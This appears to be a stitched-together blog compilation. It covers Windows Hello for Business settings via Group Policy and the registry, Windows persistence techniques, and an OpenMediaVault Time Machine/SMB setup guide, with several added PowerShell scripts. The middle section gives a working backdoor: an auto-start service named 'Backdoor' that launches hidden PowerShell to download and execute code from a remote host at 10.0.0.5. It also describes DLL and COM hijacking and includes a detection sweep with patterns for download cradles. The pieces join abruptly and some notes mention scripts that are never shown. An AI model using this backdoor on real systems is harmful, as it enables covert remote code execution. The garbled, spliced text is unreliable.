If you are not sure which kind of Windows 10 you are using, jump to Section 2
1 For Domain Joined / Intune Managed Windows 10
If you are configuring domain joined or Intune managed Windows 10 devices, sometimes we want to give the user the option of using Windows Hello or not. In that case follow this guide first: “Windows 10 Sign-in options and Windows Hello Set up button greyed out After Joined AAD (Azure Active Directory)”. That guide changes Windows Hello for Business organisation wide, so it applies to every Windows 10 device enrolled from then on: the next time a new Windows 10 device is enrolled in AAD, the system will ask the user to set up a PIN / Windows Hello / Windows Hello for Business during enrolment. Sometimes, though, we don’t want Windows Hello / Windows Hello for Business set up on particular devices. Follow Section 2 to enable or disable Windows Hello for Business on an individual device.
2 For domain joined/ Intune Managed, non-domain joined/non-Intune managed and all other average users of Windows 10
2.1 Enable and Disable Windows Hello for Business via Group Policy
2.1.1 Use Win + R to launch the “Run” window
2.1.2 Type gpedit.msc then hit the Enter key to open the Local Group Policy Editor
2.1.3 Navigate to “Computer Configuration” -> “Administrative Templates” -> “Windows Components” -> “Windows Hello for Business”
2.1.4 Double click on “Use Windows Hello for Business”
2.1.5 In the pop-up window we can Enable or Disable Windows Hello for Business, and also check or uncheck “Do not start Windows Hello provisioning after sign-in”
To have Windows 10 ask users to set up Windows Hello for Business right after login, leave the “Do not start Windows Hello provisioning after sign-in” option unchecked. (Useful for pre-configuring a device before delivering it to the end user, as a way of forcing the end user to set up Windows Hello for Business. If Multi-factor authentication (MFA) is configured, they may be asked to configure MFA before configuring Windows Hello for Business.)
To stop Windows 10 asking users to set up Windows Hello for Business right after login, check the “Do not start Windows Hello provisioning after sign-in” option.
2.2 Enable and Disable Windows Hello for Business via Registry
2.2.1 Follow Steps 2.1.1 to 2.1.2, but instead of typing “gpedit.msc” type “regedit”
2.2.2 Navigate to “Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\PassportForWork”
(If the “PassportForWork” key does not exist, create it manually: right click on “Microsoft” -> select “New” -> “Key” -> name it “PassportForWork”)
2.2.3 We need to create two DWORD values, “Enabled” and “DisablePostLogonProvisioning”: right click in the right panel, select “New” -> “DWORD (32-bit) Value”. “Enabled” set to 1 turns Windows Hello for Business on and 0 turns it off (the same as Enable/Disable in Step 2.1.5); “DisablePostLogonProvisioning” set to 1 is the same as checking “Do not start Windows Hello provisioning after sign-in”, and 0 the same as leaving it unchecked.
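The registry steps above can be scripted instead of done by hand in regedit. The following is an added example, not code from the original post: it writes the same two DWORD values under HKLM\SOFTWARE\Policies\Microsoft\PassportForWork from an elevated PowerShell prompt and reads them back. The function and parameter names are my own.

```powershell
#Requires -RunAsAdministrator
# Added example (not from the original post). Sets the Windows Hello for Business
# policy values that Section 2.2 creates by hand in regedit.
#   Enabled                      1 = "Use Windows Hello for Business" enabled, 0 = disabled
#   DisablePostLogonProvisioning 1 = "Do not start Windows Hello provisioning after sign-in" checked
function Set-WhfbPolicy {
    [CmdletBinding(SupportsShouldProcess)]
    param(
        [Parameter(Mandatory)][bool]$Enabled,
        [bool]$DisablePostLogonProvisioning = $false
    )
    $key = 'HKLM:\SOFTWARE\Policies\Microsoft\PassportForWork'
    # Same as Step 2.2.2: create the PassportForWork key if it is missing.
    if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }

    $values = @{
        Enabled                      = [int]$Enabled
        DisablePostLogonProvisioning = [int]$DisablePostLogonProvisioning
    }
    foreach ($name in $values.Keys) {
        if ($PSCmdlet.ShouldProcess("$key\$name", "set DWORD to $($values[$name])")) {
            # -Force overwrites an existing value, so this is safe to re-run.
            New-ItemProperty -Path $key -Name $name -PropertyType DWord `
                -Value $values[$name] -Force | Out-Null
        }
    }
}

# Reads the two values back so the result can be checked (returns $null if the key is absent).
function Get-WhfbPolicy {
    $key = 'HKLM:\SOFTWARE\Policies\Microsoft\PassportForWork'
    if (-not (Test-Path $key)) { return $null }
    Get-ItemProperty -Path $key | Select-Object Enabled, DisablePostLogonProvisioning
}

# Usage:
#   Set-WhfbPolicy -Enabled $true -DisablePostLogonProvisioning $true   # WHfB on, no prompt after sign-in
#   Set-WhfbPolicy -Enabled $false                                        # WHfB off
#   Set-WhfbPolicy -Enabled $true -WhatIf                                 # show what would change
#   Get-WhfbPolicy
```

On a domain joined or Intune managed device the same key is written by policy, so a later Group Policy or MDM refresh can overwrite what this script sets; that is why Section 1 sends you to the organisation-wide guide first for those devices.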
Note: When this is run from the command prompt, single quotes are turned into double quotes, which is why three double quotes are used here.
This script will launch every minute
sc create "Backdoor" binpath= "cmd /c start powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.0.0.5:8080/fun.png'))\""
REM Description for the service
sc description Backdoor "Backdoor Test"
REM Make it auto-start
sc config Backdoor start= auto
REM Start the service
net start Backdoor
Note: cmd.exe does not talk to the service control manager, so “net start” reports that the service failed to respond (error 1053); by then the PowerShell command has already been launched.
We can also use a persistence module from “PowerSploit” for this.
Run -> gpedit.msc -> User Configuration -> Windows Settings -> Scripts (Logon/Logoff)
Note: The full path must be used, e.g. “C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe”
If a process tries to load a DLL without an absolute path, Windows searches for the DLL in a fixed order of folders. If one of the folders searched before the real DLL’s location can be written to by an attacker, the malicious DLL is loaded and its code is executed.
A common example is LPK.dll hijacking.
Windows 7 and later added KnownDLLs protection, so LPK.dll has to be added to the KnownDLLs exclusion key in the registry before this hijack will work.
COM hijacking: the key is to create the right DLL and choose the right CLSID. By changing a CLSID’s value in the registry, CAccPropServicesClass hijacking and MMDeviceEnumerator hijacking can be carried out; many system processes invoke these objects when they start. This can bypass the auto-start checks in Autoruns.
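A quick way to check a machine for the persistence techniques discussed above (service with a download cradle, Group Policy logon scripts, KnownDLLs exclusions, and per-user COM registrations) is to sweep the places each one has to touch. The following is an added example, not code from the original post: the suspicious-command pattern, the file and key locations other than those named above, and all function names are my own choices.

```powershell
# Added example (not from the original post): sweep for the persistence
# techniques covered above. Run as an administrator for full coverage.

# 1. Services whose binary path runs a script interpreter or a download cradle,
#    like the "Backdoor" service created with sc above. The pattern is mine.
function Find-SuspiciousService {
    $pattern = 'powershell|pwsh|cmd(\.exe)?\s+/c|mshta|wscript|cscript|IEX\b|DownloadString|-w(indowstyle)?\s+hidden|-enc'
    Get-CimInstance Win32_Service |
        Where-Object { $_.PathName -match $pattern } |
        Select-Object Name, StartMode, State, PathName
}

# 2. Scripts registered through gpedit.msc -> Scripts (Logon/Logoff). The local
#    Group Policy editor records them in these (hidden) ini files.
function Find-GpoLogonScript {
    $base = "$env:SystemRoot\System32\GroupPolicy"
    $files = @(
        "$base\User\Scripts\scripts.ini",    "$base\User\Scripts\psscripts.ini",
        "$base\Machine\Scripts\scripts.ini", "$base\Machine\Scripts\psscripts.ini"
    )
    foreach ($f in $files) {
        if (Test-Path $f) {
            [pscustomobject]@{ File = $f; Content = (Get-Content $f -Raw -Force) }
        }
    }
}

# 3. DLLs removed from KnownDLLs protection (needed for the LPK.dll hijack).
#    ExcludeFromKnownDlls is the REG_MULTI_SZ that holds the exclusion list.
function Get-KnownDllExclusion {
    $key = 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager'
    (Get-ItemProperty -Path $key -Name ExcludeFromKnownDlls -ErrorAction SilentlyContinue).ExcludeFromKnownDlls
}

# 4. COM hijacks: a CLSID registered under HKCU is resolved before the HKLM copy,
#    so an InprocServer32 under the user hive that also exists under HKLM is a
#    hijack candidate (this is how the CLSID "value change" above takes effect).
function Find-UserComHijack {
    $hkcu = 'Registry::HKEY_CURRENT_USER\Software\Classes\CLSID'
    if (-not (Test-Path $hkcu)) { return }
    Get-ChildItem $hkcu -ErrorAction SilentlyContinue | ForEach-Object {
        $clsid  = $_.PSChildName
        $inproc = Join-Path $_.PSPath 'InprocServer32'
        if (Test-Path $inproc) {
            [pscustomobject]@{
                CLSID       = $clsid
                Dll         = (Get-ItemProperty -Path $inproc).'(default)'
                ShadowsHKLM = Test-Path "Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\$clsid"
            }
        }
    }
}

# Run everything and print each section with a header.
function Invoke-PersistenceSweep {
    '== Services with interpreter / download cradle ==';  Find-SuspiciousService | Format-Table -AutoSize
    '== Group Policy logon/logoff scripts ==';             Find-GpoLogonScript   | Format-List
    '== KnownDLLs exclusions ==';                          Get-KnownDllExclusion
    '== Per-user COM registrations ==';                    Find-UserComHijack    | Format-Table -AutoSize
}

Invoke-PersistenceSweep
```

Every hit needs a human look: some software legitimately registers per-user COM objects, and a vendor service may launch a script. The point of the sweep is that each technique above leaves a footprint in a known place, so a baseline taken on a clean build can be compared against later.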
Remote Control, Remote Access Trojan (RAT)
A RAT is a type of malicious program that plants a backdoor on the victim’s device. It usually propagates through ordinary-looking content such as email attachments or game programs. Attackers use RATs on clients’ devices to spread further and eventually build a botnet.
To keep a system safe from backdoors, we need to know how to investigate intrusions, keep the system up to date, and check server security regularly.
In How To: Create Apple Time Machine in Open Media Vault (OMV) we walked through creating an Apple Time Machine destination in OMV 4 with the openmediavault-netatalk plugin. That works with many older and newer macOS versions, but it is not possible to see or share the files in that space from Microsoft Windows operating systems such as Windows 10.
From macOS Mojave 10.14 onwards (including macOS Catalina 10.15), Time Machine can back up to a Windows Share/Shared Folder/SMB/CIFS. (Suggested minimum SMB version: 3)
This guide will not only walk you through creating an Apple Time Machine destination in open media vault 5 (OMV 5) with a Shared Folder/SMB Share/Windows Share/CIFS; you will also learn how to create a Windows shared folder in OMV 5 for use between Windows PC <-> Windows PC, Windows PC <-> macOS, and macOS <-> macOS.
2.1 Make sure the physical disk is attached to the device
2.2 Log in to the open media vault web UI
2.3 Go to “Storage” -> “Disks”
2.4 Scan for disks if it is not listed
2.5 Go to “Storage” -> “File Systems”
2.6 Click on the “Create” button to create a file system and initialise the disk for use
2.7 When creating the file system, make sure you have selected the correct “Device”; you can leave the “Label” empty, and select the default “EXT4” as “File system” if you are not sure which one to choose.
2.8 Now the new file system is created, we need to mount it (attach it for use). Select the file system we have just created, then click on the Mount button
2.9 Click on “Apply” to commit the change
3 Create Windows Share (SMB Share/Shared Folder/CIFS) For Time Machine (and Windows) to use/share
3.1 Go to “Services” -> “SMB/CIFS”
3.2 Click on “Shares” then click on “Add”
3.3 Click on “+” button from “Shared folder” row
3.4 Give it a name, select the correct device, create a path, leave the permissions as default, then click on the “Save” button to save the settings
3.5 Make sure the “Shared folder” row has the right settings and that “Time Machine support” is enabled, then click on the “Save” button to save the settings
3.6 Click on “Settings” and enable the SMB/CIFS service
3.7 Now you will be able to find the Time Machine folder from your macOS -> top left corner “Apple Icon” -> “System Preferences” -> “Time Machine” -> “Select Backup Disk…” (Warning: it is a good idea to continue with Section 4 and use a dedicated account for accessing the shared folder rather than OMV’s administrator account, for security reasons, though it is not essential for making the shared folder and Time Machine work)
4 Create and configure Users if necessary
4.1 Go to “Access Rights Management” -> “User”
4.2 Click on “Add” -> “Add”
4.3 Enter the name and password for the new user under the “General” tab, and make sure the user is in the “users” group under the “Group” tab
4.4 Now you should be able to see the new user in the list
5 Configure user permission for shared folder
5.1 Go to “Access Rights Management” -> “Shared Folders”
5.2 Click on the shared folder which we configured in Section 3, then click on the “Privileges” button and make sure to give “Read/Write” access to the user we created
6 Configure Time Machine on macOS
6.1 On macOS, go to the top left corner “Apple Icon” -> “System Preferences” -> “Time Machine” -> “Select Backup Disk…”
6.2 Select the one we have just created under “Available Disks” and click on the “Use Disk” button; it will start to back up automatically. If you want to secure the backup, make sure you check “Encrypt backups” before clicking on “Use Disk”
6.3 If you do not want automatic backups, just uncheck “Back Up Automatically” (Check “Show Time Machine in menu bar” to make manual backups easier: the Time Machine icon will appear at the top of the screen in the menu bar, and you can start a backup from there)
Extra: 7 Configure disk quota (Limit Time Machine size in shared folder)
7.1 In OMV, go to “Storage” -> “File Systems”, click on the file system which we created, click on “Quota”, set an appropriate size limit for the user we created for Time Machine, and click on the “Save” button
Note: This does not only limit the Time Machine backup size; it limits the usable size for that user/account on this file system, which includes both Time Machine and any Windows share. If you only want to limit the Time Machine size, use that account only for Time Machine, and create another account for the Windows share or other file sharing.
Extra: 8 Microsoft Windows access the shared folder
8.1 Open File Explorer/This PC in Windows and enter \\ followed by the IP address or host name of OMV, e.g. \\o-test.mynetwork, then press the Enter key
8.2 Enter your credential details then click on the “OK” button
8.3 Now you will see the shared folder which we created
8.4 Double click to open the shared folder. If you have already initialised a Time Machine backup, you will be able to see a folder named “YourMacName.backupbundle”
(You won’t be able to see normal file structures, e.g. the photos or documents on your macOS desktop. Since it is just for demo purposes I did not opt in to the encrypt backup option, and that is what you will see if the Time Machine backup is not encrypted.)
8.5 You can also create and modify folders and files in the shared folder from a Windows PC
(Note: I strongly suggest using this shared folder only for Time Machine, to protect the backup files from mistakes like accidental deletion or renaming. You can follow Section 3 and Section 4 again to create a dedicated shared folder for macOS and Windows PCs to share files, rather than for Time Machine to back up files and the system; the only difference is to leave the “Time Machine support” option disabled at Step 3.5)
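The guide suggests SMB 3 as the minimum and a dedicated account for the share; from a Windows PC both can be checked rather than assumed. The following is an added example, not code from the original post: it maps the OMV share with the dedicated account from Section 4 and reports the dialect, signing and encryption that Windows actually negotiated. The share name “timemachine”, the account “tmuser” and the drive letter are placeholders; the host name o-test.mynetwork is the one used in Step 8.1.

```powershell
# Added example (not from the original post): map the OMV share from Windows
# and confirm the SMB dialect is at least 3.0. Names below are placeholders.

# Map the share as a persistent drive using the dedicated share account
# (Section 4) rather than the OMV administrator account.
function Connect-OmvShare {
    param(
        [string]$Server = 'o-test.mynetwork',   # host name from Step 8.1
        [string]$Share  = 'timemachine',        # placeholder share name
        [string]$User   = 'tmuser',             # placeholder dedicated account
        [string]$Drive  = 'T'                   # drive letter to map
    )
    $cred = Get-Credential -UserName $User -Message "Password for $User on $Server"
    $unc  = "\\$Server\$Share"
    New-PSDrive -Name $Drive -PSProvider FileSystem -Root $unc `
        -Credential $cred -Persist -Scope Global | Out-Null
    # Returns $true when the share is reachable with those credentials.
    Test-Path $unc
}

# Report what was negotiated for every open connection to the server.
# Dialect "3.0", "3.0.2" or "3.1.1" satisfies the SMB 3 minimum suggested above.
function Test-OmvSmbConnection {
    param([string]$Server = 'o-test.mynetwork')
    Get-SmbConnection -ServerName $Server | ForEach-Object {
        [pscustomobject]@{
            Share       = $_.ShareName
            User        = $_.UserName
            Dialect     = $_.Dialect
            Signed      = $_.Signed
            Encrypted   = $_.Encrypted
            Smb3OrLater = ([version]$_.Dialect -ge [version]'3.0')
        }
    }
}

# Usage:
#   Connect-OmvShare                      # prompts for the tmuser password
#   Test-OmvSmbConnection | Format-Table  # check Smb3OrLater is True
#   Remove-PSDrive -Name T                # unmap when finished
```

If Smb3OrLater comes back False, the server or the client is still offering an older dialect; fix that on the OMV side before relying on the share for Time Machine, since the macOS requirement above is the same SMB 3 minimum.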